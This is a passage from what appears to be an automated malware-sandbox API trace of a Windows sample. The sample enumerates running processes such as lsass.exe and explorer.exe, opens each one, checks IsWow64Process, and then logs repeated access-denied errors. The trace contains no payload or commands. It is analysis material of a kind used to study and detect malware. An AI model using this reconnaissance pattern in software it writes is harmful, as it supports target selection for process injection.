	[0072.819] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x7721d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.819] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0072.819] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x7721a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.819] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0072.819] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x772200, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0072.819] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0072.819] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.819] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0072.819] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.820] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0072.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dc80, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0072.820] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0072.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.820] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0072.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.820] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0072.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.820] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0072.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.820] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0072.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.821] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0072.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.821] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0072.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.821] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0072.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.821] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0072.821] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.821] CloseHandle (hObject=0x224) returned 1
	[0072.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x772200, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0072.821] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0072.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.822] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0072.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x7287f8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0072.822] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0072.822] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.822] CloseHandle (hObject=0x224) returned 1
	[0072.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x7287f8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0072.822] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0072.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.822] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0072.822] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.822] CloseHandle (hObject=0x224) returned 1
	[0072.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x7721d0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.822] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0072.822] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.823] CloseHandle (hObject=0x224) returned 1
	[0072.823] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.823] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0072.823] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.823] CloseHandle (hObject=0x224) returned 1
	[0072.823] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772188, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.823] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0072.823] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.823] CloseHandle (hObject=0x224) returned 1
	[0072.823] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x728a18, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0072.823] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0072.823] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.823] CloseHandle (hObject=0x224) returned 1
	[0072.823] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x772170, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.823] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0072.823] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.824] CloseHandle (hObject=0x224) returned 1
	[0072.824] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.824] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0072.824] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.824] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0072.824] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.824] CloseHandle (hObject=0x224) returned 1
	[0072.824] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772218, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.824] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0072.824] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.824] CloseHandle (hObject=0x224) returned 1
	[0072.824] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.824] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0072.824] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.824] CloseHandle (hObject=0x224) returned 1
	[0072.825] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x7288b8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0072.825] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0072.825] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x7721b8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.825] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0072.825] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.825] CloseHandle (hObject=0x224) returned 1
	[0072.825] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0072.825] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0072.825] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.825] CloseHandle (hObject=0x224) returned 1
	[0072.825] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dd60, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0072.825] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0072.825] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.825] CloseHandle (hObject=0x224) returned 1
	[0072.825] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x728a38, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0072.825] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0072.825] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.825] CloseHandle (hObject=0x224) returned 1
	[0072.826] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72e798, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0072.826] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0072.826] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.826] CloseHandle (hObject=0x224) returned 1
	[0072.826] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0072.826] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0072.826] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.826] CloseHandle (hObject=0x224) returned 1
	[0072.826] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x772188, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.826] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0072.826] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.826] CloseHandle (hObject=0x224) returned 1
	[0072.826] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.826] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0072.826] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.826] CloseHandle (hObject=0x224) returned 1
	[0072.826] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x7288b8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0072.827] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0072.827] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.827] CloseHandle (hObject=0x224) returned 1
	[0072.827] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0072.827] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0072.827] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.827] CloseHandle (hObject=0x224) returned 1
	[0072.827] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x772188, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.827] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0072.827] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.827] CloseHandle (hObject=0x224) returned 1
	[0072.827] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x772158, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0072.827] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0072.827] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.827] CloseHandle (hObject=0x224) returned 1
	[0072.827] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72e860, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0072.827] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0072.827] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.827] CloseHandle (hObject=0x224) returned 1
	[0072.827] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x772188, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0072.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0072.828] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.828] CloseHandle (hObject=0x224) returned 1
	[0072.828] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x7721a0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0072.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0072.828] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.828] CloseHandle (hObject=0x224) returned 1
	[0072.828] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x728958, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0072.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0072.828] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.828] CloseHandle (hObject=0x224) returned 1
	[0072.828] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0072.828] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.828] CloseHandle (hObject=0x224) returned 1
	[0072.828] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x728998, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0072.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0072.828] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.828] CloseHandle (hObject=0x224) returned 1
	[0072.828] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72e6d0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0072.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0072.829] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.829] CloseHandle (hObject=0x224) returned 1
	[0072.829] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72e6d0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0072.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0072.829] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.829] CloseHandle (hObject=0x224) returned 1
	[0072.829] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x772200, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0072.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0072.829] GetLastError () returned 0x5
	[0072.829] GetLastError () returned 0x5
	[0072.829] GetLastError () returned 0x5
	[0072.829] GetLastError () returned 0x5
	[0072.829] GetLastError () returned 0x5
	[0072.829] GetLastError () returned 0x5
	[0072.829] GetLastError () returned 0x5
	[0072.829] GetLastError () returned 0x5
	[0072.829] GetLastError () returned 0x5
	[0072.829] GetLastError () returned 0x5
	[0072.829] GetLastError () returned 0x5
	[0072.829] GetLastError () returned 0x5
	[0072.829] GetLastError () returned 0x5
	[0072.829] GetLastError () returned 0x5
	[0072.829] GetLastError () returned 0x5
	[0072.829] GetLastError () returned 0x5
	[0072.829] GetLastError () returned 0x5
	[0072.829] GetLastError () returned 0x5
	[0072.829] GetLastError () returned 0x5
	[0072.829] GetLastError () returned 0x5
	[0072.829] GetLastError () returned 0x5
	[0072.829] GetLastError () returned 0x5
	[0072.829] GetLastError () returned 0x5
	[0072.829] GetLastError () returned 0x5
	[0072.829] GetLastError () returned 0x5
	[0072.829] GetLastError () returned 0x5
	[0072.829] GetLastError () returned 0x5
	[0072.829] GetLastError () returned 0x5
	[0072.829] GetLastError () returned 0x5
	[0072.829] GetLastError () returned 0x5
	[0072.829] GetLastError () returned 0x5
	[0072.829] GetLastError () returned 0x5
	[0072.830] GetLastError () returned 0x5
	[0072.830] GetLastError () returned 0x5
	[0072.830] GetLastError () returned 0x5
	[0072.830] GetLastError () returned 0x5
	[0072.830] GetLastError () returned 0x5
	[0072.830] GetLastError () returned 0x5
	[0072.830] GetLastError () returned 0x5
	[0072.830] GetLastError () returned 0x5
	[0072.830] GetLastError () returned 0x5
	[0072.830] GetLastError () returned 0x5
	[0072.830] GetLastError () returned 0x5
	[0072.830] GetLastError () returned 0x5
	[0072.830] GetLastError () returned 0x5
	[0072.830] GetLastError () returned 0x5
	[0072.830] GetLastError () returned 0x5
	[0072.830] GetLastError () returned 0x5
	[0072.830] GetLastError () returned 0x5
	[0072.830] GetLastError () returned 0x5
	[0072.830] GetLastError () returned 0x5
	[0072.830] GetLastError () returned 0x5
	[0072.830] GetLastError () returned 0x5
	[0072.830] GetLastError () returned 0x5
	[0072.830] GetLastError () returned 0x5
	[0072.830] GetLastError () returned 0x5
	[0072.830] GetLastError () returned 0x5
	[0072.830] GetLastError () returned 0x5
